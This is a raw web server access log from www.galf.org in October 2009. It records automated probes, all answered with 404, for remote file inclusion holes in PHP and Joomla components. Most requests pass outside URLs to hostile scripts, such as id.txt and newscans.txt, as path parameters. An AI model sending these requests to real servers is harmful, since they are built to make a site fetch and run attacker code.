71.6.151.148 - - [25/Oct/2009:17:09:25 -0700] "GET /SSI.php?sourcedir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:09:28 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:09:28 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:09:28 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:09:28 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:09:32 -0700] "GET /logs/SSI.php?sourcedir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:09:32 -0700] "GET /logs/access_090420.log/SSI.php?sourcedir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:09:32 -0700] "GET /logs/access_090406.log/SSI.php?sourcedir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:09:38 -0700] "GET /logs/access_091012.log%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:09:38 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:09:38 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:12:31 -0700] "GET /SSI.php?sourcedir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:12:31 -0700] "GET /logs/SSI.php?sourcedir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:12:31 -0700] "GET /logs/access_090406.log%20%20/SSI.php?sourcedir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:17:12:32 -0700] "GET ///appserv/main.php?appserv_root=http://202.29.9.192/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:17:12:33 -0700] "GET /logs////appserv/main.php?appserv_root=http://202.29.9.192/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:17:12:37 -0700] "GET ///appserv/main.php?appserv_root=http://202.29.9.192/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:17:12:45 -0700] "GET /logs////appserv/main.php?appserv_root=http://202.29.9.192/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:17:12:49 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.9.245.117 - - [25/Oct/2009:17:12:52 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.9.245.117 - - [25/Oct/2009:17:12:52 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.9.245.117 - - [25/Oct/2009:17:12:54 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.9.245.117 - - [25/Oct/2009:17:12:54 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.9.245.117 - - [25/Oct/2009:17:12:57 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [25/Oct/2009:17:18:49 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:18:49 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:18:49 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:18:49 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:19:45 -0700] "GET /logs/access_090504.log//modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:19:45 -0700] "GET /modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:19:53 -0700] "GET /logs/access_090504.log//modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:19:53 -0700] "GET /modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:20:56 -0700] "GET /logs/access_090518.log%20%20/SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:20:56 -0700] "GET /SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:20:56 -0700] "GET /logs/SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:20:57 -0700] "GET /logs/SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:20:57 -0700] "GET /logs/access_090420.log/SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:21:29 -0700] "GET /SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:21:30 -0700] "GET /logs/access_090518.log/SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:22:26 -0700] "GET /logs/access_090406.log%20%20/SSI.php?sourcedir=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:24:07 -0700] "GET /modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:24:07 -0700] "GET /modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:16 -0700] "GET /logs/access_090720.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:16 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:17 -0700] "GET /logs/access_090720.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:17 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:36 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:36 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:37 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:26:37 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:48 -0700] "GET /logs/access_090720.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:48 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:48 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:49 -0700] "GET /logs/access_090720.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:50 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:50 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:56 -0700] "GET /modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:27:56 -0700] "GET /modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:28:51 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:28:51 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:28:51 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:28:51 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:32:52 -0700] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:32:52 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:32:52 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:33:00 -0700] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:33:01 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:33:01 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
174.132.98.90 - - [25/Oct/2009:17:36:58 -0700] "GET /logs//includes/session.php?baseDir=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
174.132.98.90 - - [25/Oct/2009:17:36:58 -0700] "GET /includes/session.php?baseDir=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:01 -0700] "GET /logs/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:01 -0700] "GET /logs/access_090601.log/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:01 -0700] "GET /errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:39:07 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:39:07 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:39:07 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:39:07 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:09 -0700] "GET /logs/access_090323.log/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:12 -0700] "GET /errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:12 -0700] "GET /logs/access_090601.log/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:12 -0700] "GET /logs/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:19 -0700] "GET /logs/access_090323.log/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:25 -0700] "GET /logs/access_090601.log%20%20/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:25 -0700] "GET /errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:25 -0700] "GET /logs/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:39 -0700] "GET /logs/access_090323.log%20%20/errors.php?error=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:52 -0700] "GET /logs/access_090601.log%20%20/errors.php?error=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:39:52 -0700] "GET /errors.php?error=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:40:07 -0700] "GET /logs/access_090323.log%20%20/errors.php?error=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.6.151.148 - - [25/Oct/2009:17:41:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:17:41:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:17:41:51 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:01 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
71.6.151.148 - - [25/Oct/2009:17:42:01 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:17:42:01 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
71.6.151.148 - - [25/Oct/2009:17:42:01 -0700] "GET /logs/access.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:01 -0700] "GET /modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:01 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:05 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:06 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:22 -0700] "GET /logs/access_090420.log/administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:42:22 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:24 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:24 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:24 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:27 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:53 -0700] "GET /logs/access_090803.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:53 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:53 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:42:54 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:43:07 -0700] "GET /logs/access_090803.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:43:08 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:43:08 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:43:15 -0700] "GET /logs/access_090803.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:43:15 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:17:43:15 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:43:26 -0700] "GET /logs/access_090420.log/administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
